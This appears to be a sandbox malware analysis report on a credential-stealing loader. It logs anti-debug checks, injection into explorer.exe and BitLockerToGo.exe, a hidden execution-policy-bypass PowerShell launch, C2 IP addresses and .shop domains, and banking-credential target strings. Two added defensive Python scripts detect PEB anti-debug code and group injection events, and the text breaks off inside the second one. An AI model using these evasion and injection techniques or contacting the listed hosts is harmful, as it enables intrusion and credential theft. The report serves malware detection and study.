Source: 7C81.exe Binary or memory string: .brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunct
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2080080282.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2080080282.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2079158771.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 6E8A.exe, 0000000B.00000002.4487639564.0000021FA3037000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4512237917.0000022A4D660000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: explorer.exe, 00000002.00000000.2079158771.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2079158771.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000002.00000000.2078086633.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\sashibt System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\sashibt System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 11_2_00007FF848F23329 CheckRemoteDebuggerPresent, 11_2_00007FF848F23329
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\sashibt Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\sashibt Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process queried: DebugPort
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004F9D10 LdrInitializeThunk, 14_2_004F9D10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0255092B mov eax, dword ptr fs:[00000030h] 0_2_0255092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02550D90 mov eax, dword ptr fs:[00000030h] 0_2_02550D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02713E37 push dword ptr fs:[00000030h] 0_2_02713E37
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_025E092B mov eax, dword ptr fs:[00000030h] 4_2_025E092B
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_025E0D90 mov eax, dword ptr fs:[00000030h] 4_2_025E0D90
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_02643C47 push dword ptr fs:[00000030h] 4_2_02643C47
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_025E092B mov eax, dword ptr fs:[00000030h] 7_2_025E092B
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_025E0D90 mov eax, dword ptr fs:[00000030h] 7_2_025E0D90
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_02666DDF push dword ptr fs:[00000030h] 7_2_02666DDF
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Memory allocated: page read and write | page guard
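The "mov eax, dword ptr fs:[00000030h]" and "push dword ptr fs:[00000030h]" functions listed above are the classic 32-bit way to fetch the PEB pointer from the TEB without calling any API; the code that follows such a load normally tests PEB.BeingDebugged (offset 2) or the heap-debug bits of PEB.NtGlobalFlag (offset 0x68, mask 0x70). The "Process queried: DebugPort" entries are the API-side equivalent, NtQueryInformationProcess with the ProcessDebugPort class, which is also what CheckRemoteDebuggerPresent in 6E8A.exe calls underneath. The scanner below is an added example, not code from the sample or from this report: it finds the PEB-load encodings in a raw code buffer and looks a few bytes ahead for which PEB field is dereferenced, the same logic a YARA-style rule for these signature lines would encode. The byte buffer is constructed for the example; the scanner covers 32-bit code only (x64 code reads gs:[0x60], which is not matched), and a dereference at [reg+2] or [reg+0x68] is a heuristic, since any structure could be accessed at those offsets.

```python
# PEB-access anti-debug scanner (added example). The opcode encodings are the
# documented 32-bit x86 ones; the sample buffer is constructed, not taken from the sample.

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
PEB_BEING_DEBUGGED = 0x02   # PEB.BeingDebugged
PEB_NT_GLOBAL_FLAG = 0x68   # PEB.NtGlobalFlag
HEAP_DEBUG_FLAGS = 0x70     # FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS


def peb_read_patterns():
    """Encodings that load the PEB pointer: (bytes, mnemonic, destination register index or None)."""
    pats = [
        (bytes([0x64, 0xA1, 0x30, 0, 0, 0]), "mov eax, dword ptr fs:[0x30]", 0),        # A1 moffs32 form
        (bytes([0x64, 0xFF, 0x35, 0x30, 0, 0, 0]), "push dword ptr fs:[0x30]", None),   # FF /6
    ]
    for r, name in enumerate(REGS):
        if r == 4:                      # esp as destination is never meaningful here
            continue
        modrm = 0x05 | (r << 3)         # 8B /r with mod=00 r/m=101 (disp32 only); reg = destination
        pats.append((bytes([0x64, 0x8B, modrm, 0x30, 0, 0, 0]), f"mov {name}, dword ptr fs:[0x30]", r))
    return pats


PATTERNS = peb_read_patterns()


def peb_field_used(buf, pos, reg, window=16):
    """Look past a PEB load for a dereference of [reg+2] or [reg+0x68]; None if nothing recognisable."""
    end = min(len(buf), pos + window)
    for i in range(pos, end - 1):
        b0, b1 = buf[i], buf[i + 1]
        # movzx r32, byte ptr [reg+2]     -> 0F B6 /r, mod=01, r/m=reg, disp8=2
        if b0 == 0x0F and b1 == 0xB6 and i + 3 < len(buf) and (buf[i + 2] & 0xC7) == (0x40 | reg) \
                and buf[i + 3] == PEB_BEING_DEBUGGED:
            return "BeingDebugged"
        # cmp byte ptr [reg+2], imm8      -> 80 /7, mod=01, r/m=reg
        if b0 == 0x80 and b1 == (0x78 | reg) and i + 2 < len(buf) and buf[i + 2] == PEB_BEING_DEBUGGED:
            return "BeingDebugged"
        # mov r32, dword ptr [reg+0x68]   -> 8B /r, mod=01, r/m=reg, disp8=0x68
        if b0 == 0x8B and (b1 & 0xC7) == (0x40 | reg) and i + 2 < len(buf) and buf[i + 2] == PEB_NT_GLOBAL_FLAG:
            return "NtGlobalFlag"
        # test byte ptr [reg+0x68], 0x70  -> F6 /0, mod=01, r/m=reg
        if b0 == 0xF6 and b1 == (0x40 | reg) and i + 3 < len(buf) and buf[i + 2] == PEB_NT_GLOBAL_FLAG \
                and buf[i + 3] == HEAP_DEBUG_FLAGS:
            return "NtGlobalFlag"
    return None


def scan(buf):
    """Return every PEB load in buf with its offset, mnemonic and the PEB field used afterwards."""
    findings, i = [], 0
    while i < len(buf):
        for pat, text, reg in PATTERNS:
            if buf.startswith(pat, i):
                field = peb_field_used(buf, i + len(pat), reg) if reg is not None else None
                findings.append({"offset": i, "insn": text, "field": field})
                i += len(pat) - 1
                break
        i += 1
    return findings


# Constructed 32-bit code fragment exercising all three shapes seen in the report.
SAMPLE_CODE = bytes.fromhex(
    "9090"              # nop; nop (padding)
    "64A130000000"      # mov eax, dword ptr fs:[0x30]     ; eax = PEB
    "0FB64002"          # movzx eax, byte ptr [eax+2]     ; PEB.BeingDebugged
    "85C0"              # test eax, eax
    "7505"              # jne short +5
    "648B1D30000000"    # mov ebx, dword ptr fs:[0x30]     ; ebx = PEB
    "F6436870"          # test byte ptr [ebx+0x68], 0x70  ; PEB.NtGlobalFlag heap flags
    "64FF3530000000"    # push dword ptr fs:[0x30]         ; PEB pointer passed as argument
    "C3"                # ret
)

if __name__ == "__main__":
    for f in scan(SAMPLE_CODE):
        print(f"+0x{f['offset']:04X}  {f['insn']:<34} -> {f['field'] or 'PEB pointer only'}")
```

Run against a dumped code section (for instance the unpacked regions listed under the Yara matches) rather than the packed file on disk, since the fs:[30h] reads only exist after unpacking; that is also why the report attributes them to runtime code addresses such as 0_2_0255092B rather than to file offsets.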

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe File created: 3530.exe.2.dr
Source: C:\Windows\explorer.exe Network Connect: 77.221.157.163 80
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.139 443
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.137 443
Source: C:\Windows\explorer.exe Network Connect: 162.0.235.84 443
Source: C:\Windows\explorer.exe Network Connect: 109.172.114.212 80
Source: C:\Windows\explorer.exe Network Connect: 64.190.113.113 80
Source: C:\Windows\explorer.exe Network Connect: 125.7.253.10 80
Source: C:\Windows\explorer.exe Network Connect: 177.222.41.236 80
Source: C:\Windows\explorer.exe Network Connect: 186.145.236.93 80
Source: C:\Windows\explorer.exe Network Connect: 167.235.128.153 443
Source: C:\Windows\explorer.exe Network Connect: 185.149.100.242 443
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory allocated: C:\Windows\explorer.exe base: 3000000 protect: page read and write
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory allocated: C:\Windows\explorer.exe base: 3270000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory allocated: C:\Windows\explorer.exe base: 3290000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory allocated: C:\Windows\explorer.exe base: 8380000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4C0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory protected: C:\Windows\explorer.exe base: 3000000 protect: page execute and read and write
Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 30619D0
Source: C:\Users\user\AppData\Roaming\sashibt Thread created: unknown EIP: 32019D0
Source: C:\Users\user\AppData\Roaming\sashibt Thread created: unknown EIP: 88B19D0
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4C0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory written: PID: 1028 base: 3000000 value: 20
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory written: PID: 1028 base: 3001000 value: 48
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory written: PID: 1028 base: 8380030 value: 00
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: indexterityszcoxp.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: lariatedzugspd.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: callosallsaospz.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: outpointsozp.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: liernessfornicsa.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: upknittsoappz.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: shepherdlyopzc.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: unseaffarignsk.shop
Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\sashibt Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory written: C:\Windows\explorer.exe base: 3000000
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory written: C:\Windows\explorer.exe base: 3001000
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory written: C:\Windows\explorer.exe base: 8380030
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4C0000
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 384008
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process created: C:\Users\user\AppData\Local\Temp\6E8A.exe "C:\Users\user\AppData\Local\Temp\6E8A.exe" -HOSTRUNAS
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0A0F310 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,CheckTokenMembership, 8_2_00007FF7A0A0F310
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2078759243.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2079913510.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078759243.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2078759243.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2078759243.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2078086633.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6E8A.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6E8A.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
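Read together, the lines in this section describe two injection chains. 3530.exe allocates a read/write page in explorer.exe at 3000000, writes to it, then changes its protection to execute and read and write (the alloc, write, flip-to-executable sequence of shellcode staging), while file.exe and sashibt map sections into explorer.exe and file.exe starts a thread there; afterwards explorer.exe, a process that does not originate internet traffic on its own, connects to the listed hosts. 7C81.exe allocates an execute-and-write page in BitLockerToGo.exe at 4C0000 and writes a buffer that starts with 4D5A ("MZ"), i.e. a complete PE image, and the 7C81.exe memory dump carries the .shop hostnames. The script below is an added example and not part of the report or the sample: it parses these signature lines, groups allocate/write/protect/thread events per injector and target, assigns each pair a verdict by its strongest evidence, lists outbound connections made by system processes, and pulls candidate C2 hostnames from the string hits. The sample lines are copied from above; SYSTEM_PROCESS_NAMES and the verdict wording are the example's own assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: lines copied from the HIPS / evasion signatures above (the
# trailing "Jump to behavior" link text the report emits is accepted and ignored).
SAMPLE = r"""
Source: C:\Windows\explorer.exe Network Connect: 77.221.157.163 80
Source: C:\Windows\explorer.exe Network Connect: 107.173.160.139 443
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory allocated: C:\Windows\explorer.exe base: 3000000 protect: page read and write
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory allocated: C:\Windows\explorer.exe base: 3270000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4C0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory protected: C:\Windows\explorer.exe base: 3000000 protect: page execute and read and write
Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 30619D0
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4C0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\3530.exe Memory written: C:\Windows\explorer.exe base: 3000000
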